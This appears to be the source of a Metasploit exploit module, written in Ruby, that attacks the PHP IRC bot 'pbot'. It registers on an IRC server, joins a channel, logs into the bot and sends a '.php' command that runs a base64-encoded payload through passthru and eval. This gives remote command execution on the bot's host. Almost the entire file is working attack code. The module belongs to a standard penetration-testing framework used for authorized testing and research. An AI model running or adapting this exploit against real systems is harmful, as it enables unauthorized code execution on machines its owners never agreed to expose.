188 lines
5.4 KiB
Ruby
188 lines
5.4 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'PHP IRC Bot pbot eval() Remote Code Execution',
|
|
'Description' => %q{
|
|
This module allows remote command execution on the PHP IRC bot pbot by abusing
|
|
the usage of eval() in the implementation of the .php command. In order to work,
|
|
the data to connect to the IRC server and channel where find pbot must be provided.
|
|
The module has been successfully tested on the version of pbot analyzed by Jay
|
|
Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP
|
|
SP3.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'evilcry', # pbot analysis'
|
|
'Jay Turla', # pbot analysis
|
|
'bwall', # aka @bwallHatesTwits, PoC
|
|
'juan vazquez' # Metasploit module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'OSVDB', '84913' ],
|
|
[ 'EDB', '20168' ],
|
|
[ 'URL', 'http://resources.infosecinstitute.com/pbot-analysis/']
|
|
],
|
|
'Platform' => %w{ unix win },
|
|
'Arch' => ARCH_CMD,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 344, # According to RFC 2812, the max length message is 512, including the cr-lf
|
|
'BadChars' => '',
|
|
'DisableNops' => true,
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd',
|
|
}
|
|
},
|
|
'Targets' =>
|
|
[
|
|
[ 'pbot', { } ]
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => 'Nov 02 2009',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(6667),
|
|
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
|
|
OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
|
|
OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']),
|
|
OptString.new('PBOT_PASSWORD', [false, 'pbot Password', ''])
|
|
], self.class)
|
|
end
|
|
|
|
def check
|
|
connect
|
|
|
|
response = register(sock)
|
|
if response =~ /463/ or response =~ /464/
|
|
vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
|
|
return Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
response = join(sock)
|
|
if not response =~ /353/ and not response =~ /366/
|
|
vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
|
|
return Exploit::CheckCode::Unknown
|
|
end
|
|
response = pbot_login(sock)
|
|
quit(sock)
|
|
disconnect
|
|
|
|
if response =~ /auth/ and response =~ /logged in/
|
|
return Exploit::CheckCode::Vulnerable
|
|
else
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
|
|
def send_msg(sock, data)
|
|
sock.put(data)
|
|
data = ""
|
|
begin
|
|
read_data = sock.get_once(-1, 1)
|
|
while not read_data.nil?
|
|
data << read_data
|
|
read_data = sock.get_once(-1, 1)
|
|
end
|
|
rescue EOFError
|
|
end
|
|
data
|
|
end
|
|
|
|
def register(sock)
|
|
msg = ""
|
|
|
|
if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
|
|
msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
|
|
end
|
|
|
|
if datastore['NICK'].length > 9
|
|
nick = rand_text_alpha(9)
|
|
print_error("The nick is longer than 9 characters, using #{nick}")
|
|
else
|
|
nick = datastore['NICK']
|
|
end
|
|
|
|
msg << "NICK #{nick}\r\n"
|
|
msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
|
|
|
|
response = send_msg(sock,msg)
|
|
return response
|
|
end
|
|
|
|
def join(sock)
|
|
join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
|
|
response = send_msg(sock, join_msg)
|
|
return response
|
|
end
|
|
|
|
def pbot_login(sock)
|
|
login_msg = "PRIVMSG #{datastore['CHANNEL']} :.login"
|
|
if datastore['PBOT_PASSWORD'] and not datastore['PBOT_PASSWORD'].empty?
|
|
login_msg << " #{datastore['PBOT_PASSWORD']}"
|
|
end
|
|
login_msg << "\r\n"
|
|
response = send_msg(sock, login_msg)
|
|
return response
|
|
end
|
|
|
|
def pbot_command(sock)
|
|
encoded = Rex::Text.encode_base64(payload.encoded)
|
|
command_msg = "PRIVMSG #{datastore['CHANNEL']} :.php #{rand_text_alpha(1)} passthru(base64_decode(\"#{encoded}\"));\r\n"
|
|
response = send_msg(sock, command_msg)
|
|
return response
|
|
end
|
|
|
|
def quit(sock)
|
|
quit_msg = "QUIT :bye bye\r\n"
|
|
sock.put(quit_msg)
|
|
end
|
|
|
|
def exploit
|
|
connect
|
|
|
|
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
|
|
response = register(sock)
|
|
if response =~ /463/ or response =~ /464/
|
|
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
|
|
return
|
|
end
|
|
|
|
print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
|
|
response = join(sock)
|
|
if not response =~ /353/ and not response =~ /366/
|
|
print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
|
|
return
|
|
end
|
|
|
|
print_status("#{rhost}:#{rport} - Registering with the pbot...")
|
|
response = pbot_login(sock)
|
|
if not response =~ /auth/ or not response =~ /logged in/
|
|
print_error("#{rhost}:#{rport} - Error registering with the pbot")
|
|
return
|
|
end
|
|
|
|
print_status("#{rhost}:#{rport} - Exploiting the pbot...")
|
|
pbot_command(sock)
|
|
|
|
quit(sock)
|
|
disconnect
|
|
end
|
|
end
|